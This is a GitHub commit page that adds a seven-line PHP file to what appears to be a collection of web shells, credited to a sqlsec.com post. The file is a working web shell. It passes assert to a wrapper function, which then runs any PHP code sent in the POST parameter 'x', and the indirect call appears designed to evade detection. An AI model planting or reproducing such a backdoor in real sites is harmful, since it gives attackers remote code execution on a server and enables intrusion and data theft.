Create 2020.08.20.05.php

from : https://www.sqlsec.com/2020/07/shell.html
This commit is contained in:
tennc 2020-08-20 12:30:06 +08:00 committed by GitHub
parent 223d57c52c
commit d8cdd62ab1
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

7
php/2020.08.20.05.php Normal file
View file

@ -0,0 +1,7 @@
<?php
function sqlsec($a){
$a($_POST['x']);
}
sqlsec(assert);
?>